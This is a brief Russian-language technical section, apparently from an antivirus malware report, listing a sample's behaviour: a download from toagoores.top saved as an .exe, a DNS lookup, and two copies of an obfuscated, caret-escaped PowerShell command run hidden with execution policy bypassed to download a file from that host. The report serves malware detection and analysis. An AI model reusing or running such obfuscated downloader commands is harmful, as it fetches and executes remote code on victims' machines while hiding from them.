Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWe^RShel^L^.^ex^e ^-E^XecU^tioNPo^Li^Cy^ bYPAsS -N^Op^ro^FILE^ ^-wiN^D^o^wsTyL^e HIdDeN (^neW^-oBjEcT S^YSTEM.nET.W^eB^cL^IeN^t^).dow^N^lo^a^DfILE('http://toagoores.top/re...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "poWe^RShel^L^.^ex^e ^-E^XecU^tioNPo^Li^Cy^ bYPAsS -N^Op^ro^FILE^ ^-wiN^D^o^wsTyL^e HIdDeN (^neW^-oBjEcT S^YSTEM.nET.W^eB^cL^IeN^t^).dow^N^lo^a^DfILE('http://toagoores.top/re...' (со скрытым окном)